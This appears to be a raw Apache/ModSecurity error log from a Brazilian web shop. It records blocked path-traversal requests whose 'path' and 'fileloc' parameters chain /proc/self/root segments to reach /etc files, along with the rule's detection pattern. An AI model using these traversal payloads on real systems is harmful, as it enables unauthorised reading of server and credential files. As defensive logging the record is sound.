[Fri Mar 20 12:44:50.712297 2026] [:error] [pid 7893:tid 140411565680384] [client 74.7.241.31:37294] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1rchCii7xarUs8iHao_wAAAhU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:44:52.230916 2026] [:error] [pid 15826:tid 140411548894976] [client 74.7.241.31:37296] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1rdOoXxyEfFpUF8f-9SAAAAVc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:44:55.793123 2026] [:error] [pid 10189:tid 140411725141760] [client 74.7.241.31:37300] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1rdzJ3M9BSuKP7CAZpCgAAAII"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:44:57.091366 2026] [:error] [pid 10189:tid 140411616036608] [client 74.7.241.31:37304] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1reTJ3M9BSuKP7CAZpDwAAAI8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:44:58.422925 2026] [:error] [pid 7893:tid 140411632822016] [client 74.7.241.31:56734] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1rehCii7xarUs8iHapBQAAAg0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:44:58.678989 2026] [:error] [pid 7893:tid 140411649607424] [client 74.7.241.31:56734] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1rehCii7xarUs8iHapBgAAAgs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:45:05.664188 2026] [:error] [pid 31215:tid 140411716749056] [client 74.7.241.31:56740] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1rgQF0L0L-SsrnPo6lfgAAAsM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:45:11.727796 2026] [:error] [pid 11167:tid 140411548894976] [client 74.7.241.31:40942] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1rh_HIg5MgXLBnicMx5wAAAdc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:45:14.494799 2026] [:error] [pid 21219:tid 140411565680384] [client 74.7.241.31:40950] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1rifXLqtnMIWvjpaLbQAAAApU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:45:16.515033 2026] [:error] [pid 10189:tid 140411590858496] [client 74.7.241.31:40954] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1rjDJ3M9BSuKP7CAZpIQAAAJI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 12:45:19.575853 2026] [:error] [pid 11167:tid 140411666392832] [client 57.141.18.62:37584] [client 57.141.18.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1rj_HIg5MgXLBnicMx7QAAAck"]
[Fri Mar 20 12:45:23.423455 2026] [:error] [pid 7893:tid 140411716749056] [client 74.7.241.31:36476] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1rkxCii7xarUs8iHapLQAAAgM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:45:27.164128 2026] [:error] [pid 7893:tid 140411548894976] [client 74.7.241.31:36490] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1rlxCii7xarUs8iHapMwAAAhc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:45:29.844215 2026] [mime_magic:error] [pid 10189:tid 140411557287680] (70014)End of file found: [client 74.7.243.128:34214] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/usr/lib/kbd/keymaps/legacy/mac
[Fri Mar 20 12:45:37.654881 2026] [:error] [pid 7235:tid 140411540502272] [client 57.141.18.53:38822] [client 57.141.18.53] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/hosts.deny"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1rofqxLDW4GITHUkQqCAAAARg"]
[Fri Mar 20 12:45:38.291244 2026] [:error] [pid 9818:tid 140411574073088] [client 57.141.18.28:38874] [client 57.141.18.28] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/services"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1rol1pVZ5mVmJwsFNsCwAAAFQ"]
[Fri Mar 20 12:45:44.172888 2026] [:error] [pid 10189:tid 140411733534464] [client 216.73.216.191:39282] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1rqDJ3M9BSuKP7CAZpSgAAAIE"]
[Fri Mar 20 12:45:57.890334 2026] [:error] [pid 9818:tid 140411716749056] [client 216.73.216.191:40092] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/locale.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab1rtV1pVZ5mVmJwsFNsKQAAAEM"]
[Fri Mar 20 12:45:58.803688 2026] [:error] [pid 9818:tid 140411624429312] [client 216.73.216.191:40160] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/aliases"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab1rtl1pVZ5mVmJwsFNsLwAAAE4"]
[Fri Mar 20 12:46:02.770804 2026] [:error] [pid 11642:tid 140411616036608] [client 74.7.244.43:55074] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab1rurninkcc-iUj5AqYrwAAA48"]
[Fri Mar 20 12:46:04.539857 2026] [:error] [pid 15826:tid 140411565680384] [client 216.73.216.191:40548] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/subgid-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab1rvOoXxyEfFpUF8f-9pQAAAVU"]
[Fri Mar 20 12:46:04.851724 2026] [:error] [pid 15826:tid 140411599251200] [client 216.73.216.191:40570] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/url =<width>x<height> \\"optional title\\""] [unique_id "ab1rvOoXxyEfFpUF8f-9qAAAAVE"]
[Fri Mar 20 12:46:05.964012 2026] [:error] [pid 7893:tid 140411616036608] [client 216.73.216.191:40666] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/login.defs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab1rvRCii7xarUs8iHapYAAAAg8"]
[Fri Mar 20 12:46:07.587960 2026] [:error] [pid 10189:tid 140411658000128] [client 216.73.216.191:40796] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/cron.deny"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab1rvzJ3M9BSuKP7CAZpYwAAAIo"]
[Fri Mar 20 12:46:19.201057 2026] [mime_magic:error] [pid 7893:tid 140411574073088] (70014)End of file found: [client 57.141.18.62:41484] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 12:46:20.745481 2026] [mime_magic:error] [pid 11642:tid 140411716749056] (70014)End of file found: [client 74.7.243.128:34492] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/var/run/systemd/generator.early/multi-user.target.wants
[Fri Mar 20 12:46:26.279141 2026] [:error] [pid 21219:tid 140411557287680] [client 216.73.216.191:41926] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/tenable_tag"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/'"] [unique_id "ab1r0vXLqtnMIWvjpaLbugAAApY"]
